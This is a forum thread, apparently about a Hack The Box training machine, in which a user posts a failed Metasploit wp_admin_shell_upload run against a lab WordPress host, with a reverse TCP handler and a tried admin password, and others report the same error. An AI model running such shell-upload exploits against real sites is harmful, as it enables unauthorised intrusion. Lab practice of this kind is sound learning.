Starting Point: Shield

eddieferetro · June 4, 2020, 9:38pm

Hi all: I’m stuck with that machine.

I am not able to login in the wordpress server, neither via web nor using metasploit:

msf5 exploit(unix/webapp/wp_admin_shell_upload) > use exploit/unix/webapp/wp_admin_shell_upload
msf5 exploit(unix/webapp/wp_admin_shell_upload) > set PASSWORD P@s5w0rd!
PASSWORD => P@s5w0rd!
msf5 exploit(unix/webapp/wp_admin_shell_upload) > set USERNAME admin
USERNAME => admin
msf5 exploit(unix/webapp/wp_admin_shell_upload) > set TARGETURI /wordpress
TARGETURI => /wordpress
msf5 exploit(unix/webapp/wp_admin_shell_upload) > set RHOSTS 10.10.10.29
RHOSTS => 10.10.10.29
msf5 exploit(unix/webapp/wp_admin_shell_upload) > run

[] Started reverse TCP handler on 10.10.14.196:4444
[] Authenticating with WordPress using admin:P@s5w0rd!..
[-] Exploit aborted due to failure: no-access: Failed to authenticate with WordPress

I know that the user exists, because I can try to ‘recover password’ and it doesn’t fail, but the password seems to be wrong.

What am I doing wrong?

Virus4iq · June 5, 2020, 12:11am

i have the same problem

psychepoint · November 25, 2024, 3:40am

Im getting the same issue with knowledge check in HTB course.

Exploit aborted due to failure: no-access: [ip address]:80 - Authentication failed

what causes this to happen? is there a way to make metasploit verbose?

Topic		Replies	Views
Starting Point Shield Machines	7	2106	December 21, 2020
Starting Point Shield Machines	2	775	June 28, 2020
Problem with wp_shell_upload from metasploit.... Other	4	2075	May 5, 2021
Starting Point - Shield Machines	1	825	July 15, 2021
[Resolved] Starting Point SHIELD: Unable to load Metasploit wp_admin_shell_upload Machines	4	5088	August 18, 2021

Starting Point: Shield

Related topics